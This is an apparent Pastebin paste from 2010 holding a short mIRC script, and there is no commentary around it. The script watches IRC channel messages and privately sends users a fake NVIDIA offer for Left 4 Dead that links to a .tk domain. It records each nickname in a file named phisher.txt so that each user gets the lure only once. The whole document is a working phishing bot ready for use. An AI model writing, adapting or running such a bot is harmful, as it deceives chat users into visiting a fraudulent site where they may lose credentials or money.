Share Pastebin
Guest
Public paste!

Untitled

By: a guest | Mar 21st, 2010 | Syntax: None | Size: 0.48 KB | Hits: 66 | Expires: Never
This paste has a previous version, view the difference. Copy text to clipboard
  1. on *:TEXT:*:#: {  
  2.   inc %phish
  3.   {
  4.     if (%phish == 1) && ($read($mircdir $+ \phisher.txt, s, $nick) == 1 ) {
  5.       halt
  6.     }
  7.     if (%phish == 1) && ($read($mircdir $+ \phisher.txt, s, $nick) != 1 ) {
  8.       msg $nick Hello, there is now a new offer from NVIDIA. If you have been looking for Left 4 Dead now is your chance. http://nvidiapromol4d.tk
  9.       write $mircdir $+ \phisher.txt $nick 1
  10.       halt
  11.     }
  12.     if (%phish == 5) {
  13.       set %phish 0
  14.       halt
  15.     }
  16.   }
  17. }